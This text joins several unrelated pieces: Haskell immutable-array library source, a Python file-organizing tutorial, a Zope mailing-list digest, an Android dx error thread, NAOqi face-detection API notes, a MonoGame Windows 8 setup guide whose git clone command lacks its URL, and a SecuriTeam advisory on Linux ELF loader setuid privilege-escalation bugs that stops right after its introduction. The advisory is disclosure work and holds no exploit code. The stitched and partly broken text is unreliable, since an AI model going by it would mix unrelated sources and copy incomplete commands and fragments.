static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs * regs)
{
        size = elf_ex.e_phnum * sizeof(struct elf_phdr);
        elf_phdata = (struct elf_phdr *) kmalloc(size, GFP_KERNEL);
        if (!elf_phdata)
                goto out;
477:    retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *) elf_phdata, size);
        if (retval < 0)
                goto out_free_ph;

The code presented above looks harmless enough. However, checking the return value of kernel_read (which calls file->f_op->read) to be non-negative is not sufficient, since a read() can perfectly legally return fewer than the requested number of bytes. The bug is present in lines 301, 523 and 545 as well.
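For contrast, the defensive pattern the advisory says is missing, retrying until the whole buffer is actually filled, can be sketched in user-space Python as a file-API analogy of kernel_read. The helper name read_exact is invented here:

```python
import io

def read_exact(f, size):
    """Read exactly `size` bytes from file object `f`, looping over
    short reads. A single read() may legally return fewer bytes than
    requested, which is exactly the case the kernel code above fails
    to handle after kernel_read()."""
    buf = bytearray()
    while len(buf) < size:
        chunk = f.read(size - len(buf))
        if not chunk:  # EOF before `size` bytes arrived: hard error
            raise EOFError("short file: got %d of %d bytes" % (len(buf), size))
        buf.extend(chunk)
    return bytes(buf)

# A 16-byte, e_ident-sized read from an in-memory "file":
header = read_exact(io.BytesIO(b"\x7fELF" + b"\x00" * 12), 16)
print(header[:4])  # b'\x7fELF'
```

A loader using this pattern would either get a fully populated header buffer or fail cleanly, instead of operating on a buffer partially filled with stale kernel memory.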
* Incorrect error behavior if the mmap() call fails (loop to mmap binary sections into memory):

645:  for(i = 0, elf_ppnt = elf_phdata; i < elf_ex.e_phnum; i++, elf_ppnt++) {
684:      error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt, elf_prot, elf_flags);
          if (BAD_ADDR(error))
              continue;

* Bad return value mishandling while mapping the program interpreter into memory:

301:  retval = kernel_read(interpreter, interp_elf_ex->e_phoff, (char *)elf_phdata, size);
      error = retval;
      if (retval < 0)
          goto out_close;

      eppnt = elf_phdata;
      for (i = 0; i < interp_elf_ex->e_phnum; i++, eppnt++) {
          map_addr = elf_map(interpreter, load_addr + vaddr, eppnt, elf_prot, elf_type);
322:      if (BAD_ADDR(map_addr))
              goto out_close;

  out_close:
      kfree(elf_phdata);
  out:
      return error;
  }

* The loaded interpreter section can contain an interpreter name string without the terminating NULL:

508:  for (i = 0; i < elf_ex.e_phnum; i++) {
518:      elf_interpreter = (char *) kmalloc(elf_ppnt->p_filesz, GFP_KERNEL);
          if (!elf_interpreter)
              goto out_free_file;
          retval = kernel_read(bprm->file, elf_ppnt->p_offset, elf_interpreter, elf_ppnt->p_filesz);
          if (retval < 0)
              goto out_free_interp;

* A bug exists in the common execve() code in exec.c: a vulnerability in open_exec() permits read access to executable-only files (detailed in the analysis below).

Analysis

* The Linux man pages state that a read(2) can return less than the requested number of bytes, even zero. It is not clear how this can happen while reading a disk file (in contrast to network sockets); however, here are some thoughts:

* Tricking read into filling the elf_phdata buffer with less than size bytes would cause the remaining part of the buffer to contain some garbage data, that is, data from the previous kernel object which occupied that memory area. Therefore we could arbitrarily modify the memory layout of the binary by supplying suitable header information in the kernel buffer. This should be sufficient to gain control over the flow of execution for most of the setuid binaries around.

* On Linux a disk read goes through the page cache.
That is, a disk read can easily fail on a page boundary due to a low memory condition. In this case read() will return less than the requested number of bytes but still indicate success (return value > 0).

* Most of the standard setuid binaries on a 'normal' i386 Linux installation have ELF headers stored below the 4096th byte; therefore they are probably not exploitable on the i386 architecture.

* This bug can lead to an incorrectly mmaped binary image in memory. There are various reasons why a mmap() call can fail:

* A temporary low memory condition, so that the allocation of a new VMA descriptor fails.
* Memory limit (RLIMIT_AS) exceeded, which can be easily manipulated before calling execve().
* File locks held for the binary file in question.

Security implications in the case of a setuid binary are quite obvious: we may end up with a binary without the .text or .bss section, or with those sections shifted (in the case they are not 'fixed' sections). It is not clear which standard binaries are exploitable; however, it is sufficient that at some point we come over some instructions that jump into the environment area due to the malformed memory layout and gain full control over the setuid application.

* This bug is similar to the previous one, except the code incorrectly returns the kernel_read status to the calling function on mmap failure, which will assume that the program interpreter has been loaded. That means the kernel will start the execution of the binary file itself instead of calling the program interpreter (linker) that has to finish the binary setup. It has been found that standard Linux (i386, GCC 2.95) setuid binaries contain code that will jump to the EIP=0 address and crash (since there is no virtual memory mapped there); however, this may vary from binary to binary as well as from architecture to architecture and may be easily exploitable.
* This bug leads to internal kernel file system functions being called with an argument string exceeding the maximum path size in length (PATH_MAX). It is not clear if this condition is exploitable. A user may try to execute such a malicious binary with an unterminated interpreter name string and trick the kernel memory manager into returning a memory chunk for the elf_interpreter variable followed by a suitably long path name (like ./././....). Experiments show that it can lead to a perceivable system hang.

* This bug is similar to the shared file table race [1]. Proof of concept code that just core dumps the non-readable but executable ELF file is listed at the end of this article. A user may create a manipulated ELF binary that requests a non-readable but executable file as program interpreter and gain read access to the privileged binary. This works only if the file is a valid ELF image file, so it is not possible to read a data file that has the execute bit set but the read bit cleared. A common usage would be to read exec-only setuid binaries to gain offsets for further exploitation.

Proof Of Concept

/*
 *
 * binfmt_elf executable file read vulnerability
 *
 * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
 *
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <linux/elf.h>

#define BADNAME "/tmp/_elf_dump"

void usage(char *s)
{
    printf("\nUsage: %s executable\n\n", s);
    exit(0);
}

// ugly mem scan code :-)
static volatile void bad_code(void)
{
    __asm__(
//      "1:        jmp 1b              \n"
        "          xorl %edi, %edi     \n"
        "          movl %esp, %esi     \n"
        "          xorl %edx, %edx     \n"
        "          xorl %ebp, %ebp     \n"
        "          call get_addr       \n"
        "          movl %esi, %esp     \n"
        "          movl %edi, %ebp     \n"
        "          jmp inst_sig        \n"
        "get_addr: popl %ecx           \n"   // sighand
        "inst_sig: xorl %eax, %eax     \n"
        "          movl $11, %ebx      \n"
        "          movb $48, %al       \n"
        "          int $0x80           \n"
        "ld_page:  movl %ebp, %eax     \n"
        "          subl %edx, %eax     \n"
        "          cmpl $0x1000, %eax  \n"
        "          jle ld_page2        \n"
        // mprotect
        "          pusha               \n"
        "          movl %edx, %ebx     \n"
        "          addl $0x1000, %ebx  \n"
        "          movl %eax, %ecx     \n"
        "          xorl %eax, %eax     \n"
        "          movb $125, %al      \n"
        "          movl $7, %edx       \n"
        "          int $0x80           \n"
        "          popa                \n"
        "ld_page2: addl $0x1000, %edi  \n"
        "          cmpl $0xc0000000, %edi \n"
        "          je dump             \n"
        "          movl %ebp, %edx     \n"
        "          movl (%edi), %eax   \n"
        "          jmp ld_page         \n"
        "dump:     xorl %eax, %eax     \n"
        "          xorl %ecx, %ecx     \n"
        "          movl $11, %ebx      \n"
        "          movb $48, %al       \n"
        "          int $0x80           \n"
        "          movl $0xdeadbeef, %eax \n"
        "          jmp *(%eax)         \n"
    );
}

static volatile void bad_code_end(void)
{
}

int main(int ac, char **av)
{
    struct elfhdr eh;
    struct elf_phdr eph;
    struct rlimit rl;
    int fd, nl, pid;

    if (ac < 2)
        usage(av[0]);

    // make bad a.out
    fd = open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);
    nl = strlen(av[1]) + 1;

    // elf exec header
    memset(&eh, 0, sizeof(eh));
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_386;
    eh.e_phentsize = sizeof(struct elf_phdr);
    eh.e_phnum = 2;
    eh.e_phoff = sizeof(eh);
    write(fd, &eh, sizeof(eh));

    // section header(s)
    memset(&eph, 0, sizeof(eph));
    eph.p_type = PT_INTERP;
    eph.p_offset = sizeof(eh) + 2*sizeof(eph);
    eph.p_filesz = nl;
    write(fd, &eph, sizeof(eph));

    memset(&eph, 0, sizeof(eph));
    eph.p_type = PT_LOAD;
    eph.p_offset = 4096;
    eph.p_filesz = 4096;
    eph.p_vaddr = 0x0000;
    eph.p_flags = PF_R|PF_X;
    write(fd, &eph, sizeof(eph));

    // .interp
    write(fd, av[1], nl);

    // execable code
    nl = &bad_code_end - &bad_code;
    lseek(fd, 4096, SEEK_SET);
    write(fd, &bad_code, 4096);
    close(fd);

    // dump the ***
    rl.rlim_cur = RLIM_INFINITY;
    rl.rlim_max = RLIM_INFINITY;
    if (setrlimit(RLIMIT_CORE, &rl))
        perror("\nsetrlimit failed");

    fflush(stdout);
    pid = fork();
    if (pid)
        wait(NULL);
    else
        execl(BADNAME, BADNAME, NULL);

    printf("\ncore dumped!\n\n");
    unlink(BADNAME);
    return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:ihaquer@isec.pl> Paul Starzetz.
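The 52-byte Elf32_Ehdr that the proof of concept fills in C can also be illustrated with Python's struct module. This sketch packs only the header fields the PoC sets (ET_EXEC, EM_386, two program headers), with offsets per the ELF32 layout; it is not a port of the exploit:

```python
import struct

# Pack a minimal ELF32 executable header the way the PoC's C code
# fills `struct elfhdr`: magic, ET_EXEC (2), EM_386 (3), phdr table
# directly after the 52-byte header, 32-byte entries, two entries.
e_ident = b"\x7fELF" + bytes(12)          # magic + padding
ehdr = struct.pack(
    "<16sHHIIIIIHHHHHH",
    e_ident,
    2,        # e_type      = ET_EXEC
    3,        # e_machine   = EM_386
    0,        # e_version
    0,        # e_entry
    52,       # e_phoff     = sizeof(Elf32_Ehdr)
    0,        # e_shoff
    0,        # e_flags
    52,       # e_ehsize
    32,       # e_phentsize = sizeof(Elf32_Phdr)
    2,        # e_phnum
    0, 0, 0,  # e_shentsize, e_shnum, e_shstrndx (unused here)
)
print(len(ehdr), ehdr[:4])  # 52 b'\x7fELF'
```

Seeing the header laid out field by field makes it clearer which values the loader trusts: e_phoff, e_phentsize and e_phnum drive exactly the kernel_read and mmap loops the advisory dissects.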
http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-11/0045.html
Managing VMs like a Data Scientist

Managing virtual machines (VMs) as a data scientist can be tedious. If you are like me and work in a team that is not fortunate enough to have a data engineer cleaning, prepping and giving you your data on a plate with some garnish on the side, then you have to manage, extract and manipulate files sitting on various VMs. Logging into each of these VMs to see if all the necessary files dumped, all the necessary packages installed and all the cron jobs executed on time can be a time-consuming, inefficient and downright laborious task.

Luckily Python comes to the rescue with a package called paramiko. This post explains how you can wrap your VMs in a DataFrame and execute the same command on all of them, saving the returned output in a Python DataFrame. The code for this post can be found on this git repo. Although this post relates to managing VMs, the underlying hack applied here is to use your current knowledge of DataFrames, with all their great functionalities that we all have come to know and love, combined with Python Classes, to abstract away tedium and make inefficient tasks more efficient.

Background

Below is some background for those stumbling onto this post with no clue about any of the topics. Feel free to skip the sections you know a lot about, as the snippets below give a high-level overview to ensure the post makes sense as a whole.

VMs

As I work at a corporate and want to avoid disclosing the IPs, I've opted to spin up 4 VMs on Google Cloud Platform (GCP), but the methodology for any VM on any domain is the same. If you are using GCP and you have the gcloud sdk installed, spinning up GCP VMs via the command line can be achieved with a one-liner as shown below.
gcloud compute instances create vm1 --custom-cpu 1 --custom-memory 1
gcloud compute instances create vm2 --custom-cpu 2 --custom-memory 2
gcloud compute instances create vm3 --custom-cpu 1 --custom-memory 1
gcloud compute instances create vm4 --custom-cpu 2 --custom-memory 2

The above bash commands use the gcloud sdk to spin up 4 VMs named vm1, vm2, vm3 and vm4 respectively, with either 1 vCPU and 1Gb of RAM or 2 vCPUs and 2Gb of RAM. If you log into your GCP console, you'll see the VMs created, each with their respective public IP address that we'll be using to ssh into.

SSH

If you've never worked in a shell before, you should give it a bash… For those unfamiliar with what the shell even is, it's the screen that looks like the Matrix that all the techies use at work; I show an example below. Similar to Windows 10 or MacOS, the shell is just another way to interact with hardware and comes preinstalled with a plethora of programs like ls, cp, lscpu, top and of course ssh.

SSH, short for Secure Socket Shell, practically comes installed with every Unix (Mac OS) or Linux (Ubuntu, Red Hat, Debian) system. The ssh program runs in a shell and is used to start an SSH client program that enables a secure connection to an SSH server on a remote machine. The ssh command can be used to log into a remote machine, transfer files between two machines or execute commands on a remote machine. To log into a VM, all you need is the IP address of the VM and a username and, depending on your user configuration, either a set of ssh-keys or a password.
The syntax for the ssh command for the user root to log into a VM with IP ip then looks as follows:

ssh root@ip

In our example, for vm1 with IP 35.204.226.178 sitting on GCP, this would translate into:

ssh louwjlabuschagne_gmail_com@35.204.226.178

Running this command in a shell logs us into vm1, and the shell we are working in will now not be a local shell anymore but rather a remote shell logged into the remote VM identified by public IP 35.204.226.178.

louwjlabuschagne_gmail_com@vm1:~$

Python Classes

Python is an object-oriented programming (OOP) language. Almost everything in Python is an object, with its properties and methods. A Class is like an object constructor, or a "blueprint" for creating objects. Classes provide a means of bundling data and functionality together. Creating a new class creates a new type of object, allowing new instances of that type to be made. A toy example is shown below where we create a Person class with 2 attributes: name and age.

class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age

p1 = Person("John", 36)
print(p1.name)
print(p1.age)
Using Classes to abstract away complicated logic from the end user is a critical pillar in OOP and a great mindset to adopt to write scalable, reproducible and maintainable code. If you ever see a function in Python starting and ending with two underscores ( __), like the __init__() function above, know that these functions are “special”. The __init__() function, usually called a method instead of a function just because it is a function inside a class, but that is just some nomenclature. The __init__() method is used to initialise the class and is sometimes also called the constructor method. Similarly to the “special” __init__() method in our Class, there is another “special” method __str__() which prints the friendly name of the object. The __str__() method is called by Python when you print a class using the print() function. For example say we code up: print(Person('Jane', 29)) what should print? Just the name, or the just the age, or both? The __str__() method tells Python what it should print. Pandas Ok, the theory is almost done. Just one more topic — Pandas. Pandas is a Python library for data manipulation and analysis. In particular, it offers data structures and operations for manipulating numerical tables called dataframes. Dataframes are a data scientist’s bread and butter and is most likely the most used data type (Class) in the Pandas package. For this post you need only know two things about the DataFrame Class, viz. - what is a DataFrame (just a table) and, - what does the apply()function do to a column of a DataFrame. I show an example of the Iris dataset as a DataFrame Class below. To my dismay, pandas has no built-in datasets, so I’ve consulted another imperative data science package — seaborn. Go check it out if you can. import pandas as pd import seaborn as sns iris = sns.load_dataset('iris') iris.head() So what is a DataFrame? It’s just a table — that’s it. 
However, it's got some pretty cool built-in methods to make your data manipulation, interrogation and cleaning a much, much more pleasurable experience. If we run the code below, which calls the apply() method on the sepal_length column, we get the output shown in the table.

iris.sepal_length.apply(lambda row: 'tall' if row >= 5 else 'short')

There is a weird lambda keyword thrown into the example, which in short is just a "phantom" function, formally called an anonymous function. Basically it is a function that doesn't have a name but runs some code. In our example, this anonymous lambda function checks each row of our column and, if the sepal length is greater than or equal to five, returns 'tall'; otherwise it returns 'short'. I hope the functionality of the apply() method is clear from the example. If not, stare at it a bit, then read on.

Bring it all together

I hear you saying: "OK cool Louwrens, nice background, but so what?" Well, we've covered all the theory needed to understand what is about to happen, which is:

- Create a VM Class which gets initialised with an IP and username,
- the init method then checks if we can connect to the remote VM and uses the ✅ and ⛔️ emoticons to show a successful or unsuccessful connection.
- I then create a DataFrame containing all the IPs of our 4 remote VMs on GCP,
- then we can use the apply() method to run bash commands on these VMs and return a DataFrame.
- I then display a summary DataFrame containing the specs for these 4 VMs sitting on GCP.

Below I create the VM Class.
from paramiko import SSHClient
from paramiko.auth_handler import AuthenticationException

class VM(object):
    def __init__(self, ip, username, pkey='~/.ssh/id_rsa.pub'):
        self.ip = ip
        self.username = username
        self.pkey = pkey
        self.logged_in_emoj = '✅'
        self.logged_in = True
        try:
            ssh = SSHClient()
            ssh.load_system_host_keys()
            ssh.connect(hostname=self.ip,
                        username=self.username,
                        key_filename=self.pkey)
            ssh.close()
        except AuthenticationException as exception:
            print(exception)
            print('Login failed for %s' % (self.username + '@' + self.ip))
            self.logged_in_emoj = '⛔️'
            self.logged_in = False

    def __str__(self):
        return self.username + '@' + self.ip + ' ' + self.logged_in_emoj

I then create a DataFrame, VMs, which holds all the IPs for our 4 VMs on GCP.

VMs = pd.DataFrame(dict(IP=['35.204.255.178', '35.204.96.40', '35.204.213.24', '35.204.115.95']))

We can then call the apply() method on the DataFrame, which iterates through each host and creates a VM Class object for each VM, which gets stored in the VM column of the VMs DataFrame.

VMs['VM'] = VMs.apply(lambda row: VM(row.IP, USERNAME, PUB_KEY), axis=1)

Note that the __str__() method of our VM Class is used to represent the VM Class in a DataFrame, as seen below. Each VM is represented as username + ip + ✅, exactly how we defined it in the __str__() method.

Ok great, we've created a DataFrame with a bunch of connected VMs inside. What can we do with these? For those of you who don't know, there is a command called lscpu in Unix which displays all the information about the CPUs on a machine; below is an example output for vm1.
louwjlabuschagne_gmail_com@vm1:~$ lscpu
Model:                 85
Model name:            Intel(R) Xeon(R) CPU @ 2.00GHz
Stepping:              3
CPU MHz:               2000.170
BogoMIPS:              4000.34
Hypervisor vendor:     KVM
Virtualization type:   full
L1d cache:             32K
L1i cache:             32K
L2 cache:              256K
L3 cache:              56320K
NUMA node0 CPU(s):     0

We are now looking to get the output of the lscpu command for each of our 4 VMs on GCP; we can wrap the lscpu command in the exec_command() method (see the github repo) to return the output of each VM's lscpu command.

lscpu = VMs.VM.apply(lambda vm: exec_command('lscpu'))

With this we can obtain a DataFrame like the one shown below. Another useful command is cat /proc/meminfo, shown below, which returns the current state of the RAM for a Unix machine.

louwjlabuschagne_gmail_com@my-vm1:~$ cat /proc/meminfo
MemTotal:        1020416 kB
MemFree:          871852 kB
MemAvailable:     835736 kB
Buffers:           10164 kB
Cached:            53504 kB
SwapCached:            0 kB
Active:            92012 kB
Inactive:          17816 kB
Active(anon):      46308 kB
Inactive(anon):     4060 kB
Active(file):      45704 kB
Inactive(file):    13756 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                28 kB
Writeback:             0 kB
AnonPages:         46176 kB
Mapped:            25736 kB

I've extracted the most relevant columns from the lscpu and cat /proc/meminfo commands and display an overview of our 4 VMs below. We can plot this information quickly with a library like seaborn or plotly, which work great out of the box with DataFrame objects, or we can get summary statistics for all our VMs using the built-in methods pandas has.

Conclusion

This post has only scratched the surface of how using Classes and DataFrames in conjunction with each other can ease your life. Be sure to check out the jupyter notebook on the github repo to fill in some coding gaps I've alluded to in this post. The next time you are doing data wrangling with pandas, I encourage you to take a step back and consider wrapping some of the functionality you need in a Class and seeing how that could improve your workflow.
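As an aside before closing: the article shells out for this data, but turning the raw /proc/meminfo text into a summary is plain string work. A minimal sketch (mine, not from the repo, and independent of pandas):

```python
def parse_meminfo(text):
    """Parse `cat /proc/meminfo` output into a {field: kilobytes} dict."""
    info = {}
    for line in text.splitlines():
        key, sep, rest = line.partition(':')
        if not sep:
            continue  # skip anything that is not a "field: value" line
        parts = rest.split()
        if parts:
            info[key.strip()] = int(parts[0])
    return info

sample = """MemTotal:        1020416 kB
MemFree:          871852 kB
MemAvailable:     835736 kB"""

mem = parse_meminfo(sample)
print(mem['MemFree'])                    # 871852
print(mem['MemTotal'] - mem['MemFree'])  # 148564
```

A dict like this drops straight into a DataFrame row, which is exactly the kind of glue the VM Class could hide behind a method.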
Once written, you can always reuse the Class in your subsequent analysis or productionise it with your code. As the Python mindset goes: "Don't reinvent the wheel every time."
https://medium.com/@louwjlabuschagne/managing-vms-like-a-data-scientist-c34048c4d162?source=topic_page---------1------------------1
CC-MAIN-2019-26
refinedweb
2,193
67.18
Slice a numpy array using lists of row indices and apply a function (here, a sum) to each group of rows. Is it possible to vectorize this (or is there a non-vectorized way to do it)? Vectorized would be ideal for large matrices.

import numpy as np

index = [[1,3], [2,4,5]]
a = np.array([[ 3,  4,  6,  3],
              [ 0,  1,  2,  3],
              [ 4,  5,  6,  7],
              [ 8,  9, 10, 11],
              [12, 13, 14, 15],
              [ 1,  1,  4,  5]])

Desired output:

np.array([[ 8, 10, 12, 14],
          [17, 19, 24, 27]])

Approach #1 : Here's an almost* vectorized approach -

def sumrowsby_index(a, index):
    index_arr = np.concatenate(index)
    lens = np.array([len(i) for i in index])
    cut_idx = np.concatenate(([0], lens[:-1].cumsum()))
    return np.add.reduceat(a[index_arr], cut_idx)

*Almost because of the step that computes lens with a loop-comprehension, but since we are simply getting the lengths and no computation is involved there, that step won't sway the timings in any big way.

Sample run -

In [716]: a
Out[716]:
array([[ 3,  4,  6,  3],
       [ 0,  1,  2,  3],
       [ 4,  5,  6,  7],
       [ 8,  9, 10, 11],
       [12, 13, 14, 15],
       [ 1,  1,  4,  5]])

In [717]: index
Out[717]: [[1, 3], [2, 4, 5]]

In [718]: sumrowsby_index(a, index)
Out[718]:
array([[ 8, 10, 12, 14],
       [17, 19, 24, 27]])

Approach #2 : We could leverage fast matrix-multiplication with numpy.dot to perform those sum-reductions, giving us another method as listed below -

def sumrowsby_index_v2(a, index):
    lens = np.array([len(i) for i in index])
    id_ar = np.zeros((len(lens), a.shape[0]))
    c = np.concatenate(index)
    r = np.repeat(np.arange(len(index)), lens)
    id_ar[r, c] = 1
    return id_ar.dot(a)
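A plain-Python reference implementation (my addition, not part of the original answer) is handy for sanity-checking both NumPy approaches on small inputs:

```python
# Group rows of `a` by each index list and sum column-wise, no NumPy needed.
a = [[ 3,  4,  6,  3],
     [ 0,  1,  2,  3],
     [ 4,  5,  6,  7],
     [ 8,  9, 10, 11],
     [12, 13, 14, 15],
     [ 1,  1,  4,  5]]
index = [[1, 3], [2, 4, 5]]

result = [[sum(a[i][col] for i in group) for col in range(len(a[0]))]
          for group in index]
print(result)  # [[8, 10, 12, 14], [17, 19, 24, 27]]
```

For large matrices the vectorized versions above will be far faster, but this makes the intended semantics unambiguous.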
https://codedump.io/share/6ZUMLFu99l3F/1/sum-groups-rows-of-numpy-matrix-using-list-of-lists-of-indices
Thank you for the results NN.... now may I have permission to say a few words? ^

Well, SARKAR is happy for the moment, but go on, what is it you want to say? And remember, SARKAR knows where you live! :-p

Sir, your happiness is the happiness of us all!

It is apparent from the results that you and Asad had the right strategy to work within the limits, and you made it home in style with an excellent showing on the time clock. The best thing is that you do not have to get any significant work done to bring the car back to the same state as before. More power to you guys and inshallah better results next year!

I think the rest of the results are largely as expected (barring the DNFs), except, as I pointed out earlier, for the 3 wild card showings by Jeep. In all my previous discussions with the pundits, Jeep had been written off and utterly dismissed as a competitor at Cholistan, primarily for being too unreliable and not rally ready. Yet now we see two Wranglers (one apparently with kamanis/leaf springs) and a Grand Cherokee finishing competitively.

Nevertheless, I don't mean to sing Jeep qaseedas here, but to point out my personal favorite entry: the silver TJ Wrangler, which seems to stand 6th in the overall rankings (across categories)! Hats off to the driver, Mr. Ghulam Sarwar (and the navigator of course), for keeping up with the Top 5 modified monsters in what appears to be a raised, short wheelbase, manual transmission, near-stock Jeep TJ. Kudos!

BTW, once again many thanks to NN, Asad, Laparwah, Libra and DeadVirus for the wonderful event coverage and photography. Stealing some pics of the TJ below:

Firstly, thanks Suhaib for all your kind words of encouragement for us rally participants.
I was also very impressed with the Jeep performance, though the Grand Cherokee was what impressed me most. I would not entirely agree with your statement that it was near stock (just because he didn't remove his rear seats?); I can see twin shocks and steering dampers, and from his timing I would say he was definitely a regular entrant at these events. He does have a mighty engine, which is the most essential thing at Cholistan. His start time suggests he was 7th fastest in qualifying as well, so he definitely knew what he was doing!!

NN, some pics of the same jeep with previous owners from the Janj Shandur thread:

You are right in that the jeep has been raised by a good 4 inches and shocks and dampers added. Probably more mods too, but it still appears a fair distance from both the Bilstein/King double shock systems seen on the Vigos and the heavy duty suspension mods that you would expect from a desert racing TJ in the US. The latter would probably be something like this, with coil-over shocks on aftermarket performance 3- and 4-link suspension systems.

The Cholistan Experience 2010 Video (30min)

Pinks, brilliant stuff, will need to get the cd or dvd of it from you. Have only seen the first 7 minutes yet, the net was downloading too slow, so I will let it all buffer before I watch in one go.

Awesome video!

@all Thank you for the appreciation!!

Amazing video Shehzad Bhai....very well done. Hats off to your commitment in shooting and editing the whole thing.

Shehzad bhai.. Very impressive and inspirational indeed. Great piece of work there. Hats off. Ehsan

Was in Lahore yesterday and dropped by Saidhi's place with Janj. Later on Ahsan (I believe he drove the red and black VTC Nissan) dropped by with another friend from Karachi who rides a B-Class Vigo at Cholistan. Invariably, the focus of the discussion was the rally and Cholistan, and some interesting points came up. Saidhi treated us to a very interesting set of videos of his Jumpin' Jack Crash Jimny.
Of note are two videos of the high jump sequence and a hilarious post-crash video of him and his navigator. Waiting for upload!!! The silver TJ Wrangler was driven by Ghulam Abbas "Shar" (I may have the last name wrong, but that's how they referred to the gentleman), who apparently has been participating at Cholistan since 1993 and has always driven a Jeep Wrangler. There was obviously plenty of discussion on Saidhi's newly acquired battle-tested Pajero Evo. Apparently, just the night before, Saqib and Saidhi had a showdown between Janj's reacquired battered green Cherokee XJ (supposedly sporting a busted fuel pump) and Saidhi's 280HP Evo (sporting mismatched Honda Civic plugs)....before we get to the results, I must take my hat off to Saidhi for being a true sportsman! By the time me and Janj left, everyone was huddled around Saidhi's PC and reliving Cholistan 2010 through the coverage on this very thread!! Once again many thanks and hats off to Burhan Kundi, Shehzad, Dr nnn, Desertdevil and Fihsak for all their efforts and hard work in sharing their experience with us all! Let's start planning for next year. Thumbs up again!

That's me, 2nd from left ;)

SK, no doubt Saidhi is a true sportsman! This is a good shot, but the one with your LC going through water is a better dynamic shot IMO. I love that one more. That was just my way of bumping up the thread!!! (pic was captured by someone else, and passed on to me).
https://www.pakwheels.com/forums/t/cholistan-rally-2010-experience/105309?page=8
I have two collections: IEnumerable<lineResult> diplayedBondsList and List<string> pIsinList.

lineResult is a very simple class defined as:

public class lineResult
{
    public string isin { get; set; }
    public double rate { get; set; }
    public string issuer { get; set; }
}

I am trying to create a new List with the strings that are in pIsinList, but only if they are not already in the isin field of a lineResult element of diplayedBondsList. Kind of a "left XOR" (left because only one of the two lists' elements would be added without a correspondence in the other list). I am trying not to use too many loops because my lists hold a very large amount of data, and I think that would slow down the program. I have written this, but it does not seem to work, newBondLines always being empty:

IEnumerable<lineResult> newBondLines = diplayedBondsList.Where(item => pIsinList.IndexOf(item.isin) < 0);
foreach (lineResult lr in newBondLines)
{
    newIsinList.Add(lr.isin);
}

In addition, I do use a loop, and maybe I could avoid it with a nice LINQ statement. How could I 1) make this "left XOR" work and 2) improve its speed?
http://www.howtobuildsoftware.com/index.php/how-do/dnb/c-linq-ienumerable-left-xor-between-two-lists-with-linq
COM

H. Petschko, June 25th, 2001, 01:55 PM

I have seen several questions about this subject, yet no answer (if given at all) was satisfying to me. So here's the question again: how can I use existing COM interfaces from C#? Something to compile and run would be great. Thanks very much, phi

angelsb, June 26th, 2001, 07:26 PM

Hope this helps; it is from the how-to documentation of .NET, "How Do I...Call COM Methods from .NET?". This example demonstrates how to use a COM object from a Visual Basic.NET or C# application. In order to use the types defined within a COM library from managed code, you must obtain an assembly containing definitions of the COM types. Refer to "How Do I...Build a .NET Client That Uses a COM Server?" for specific details. With Visual Basic.NET or with C#, you can reference the assembly using the compiler /r switch, or you can add a reference to the project directly from the Visual Studio.NET development tool.

namespace TestClient {
    public class Test {
        public static void Main(){
            ExplorerLib.InternetExplorer explorer;
            ExplorerLib.IWebBrowserApp webBrowser;
            explorer = new ExplorerLib.InternetExplorer();
            webBrowser = (ExplorerLib.IWebBrowserApp) explorer;
            webBrowser.Visible = true;
            webBrowser.GoHome();
            ...
        }
    }
}

Namespace TestClient
    Public Class Test
        Public Shared Sub Main()
            Dim explorer As ExplorerLib.InternetExplorer
            Dim webBrowser As ExplorerLib.IWebBrowserApp
            explorer = New ExplorerLib.InternetExplorer
            webBrowser = explorer
            webBrowser.Visible = True
            webBrowser.GoHome
            ...
        End Sub
    End Class
End Namespace

smakadia, July 13th, 2001, 10:22 AM

Here is another great article on using COM components in .NET called "Consume COM Components From .NET". Please rate my post if you think it was helpful. Or you can send money! :)

H. Petschko, July 15th, 2001, 04:45 AM

Thanks for the help.
However, I still have two serious problems (I want to use an out-of-process server which has been tested with VB and VC++).

1) When I take a look (ildasm.exe) at the dll which has been created by tlbimp.exe, I can see that many properties, instead of returning an interface, just return a System.Object, as shown below.

get_ActiveDocument : class System.Object

Thus I have to cast and, frankly, this is not what I expected from C#...

2) Running the program causes the following exception:

An unhandled exception of type 'System.Runtime.InteropServices.VTableCallsNotSupportedException' occurred

Again, the server caused no problems with VB and VC++! Thanks for help, hansjoerg

Padma kumar, November 5th, 2001, 06:12 AM

I need to use the WebBrowser2 control in my dialog (non-MFC). Since this is possible in VB, I trust it can also be done in VC. I am using a WinMain SDK application.
http://forums.codeguru.com/archive/index.php/t-181889.html
Still on the ICFPC 2007 topic.

I am curious about one thing. If I read the file applying hGetContents to a ByteString (Lazy or Strict) or a String, it seems to read much faster than the version where I construct a sequence.

main = do
    (arg1:args) <- getArgs
    hIn <- openFile arg1 ReadMode
    c <- BL.hGetContents hIn  -- Really fast
    let dna = c
    r <- return (process dna)
    print (show (r))

main = do
    (arg1:args) <- getArgs
    hIn <- openFile arg1 ReadMode
    c <- hGetContents hIn
    let dna = fromList c  -- Kind of slow
    r <- return (process dna)
    print (show (r))

I think the "fromList" overhead will be compensated by the O(log(n)) functions on a Seq, against the O(n) counterparts on the strings.

What are your considerations about using Data.Sequence?
http://www.haskell.org/pipermail/beginners/attachments/20080725/a937c897/attachment.htm
From: Johan Torp (johan.torp_at_[hidden])
Date: 2008-05-14 08:57:48

Anthony Williams-3 wrote:
>> Maybe there isn't even a notion of a thread crashing without
>> crashing the process.
> No, there isn't. A thread "crashes" as a result of undefined behaviour, in
> which case the behaviour of the entire application is undefined.

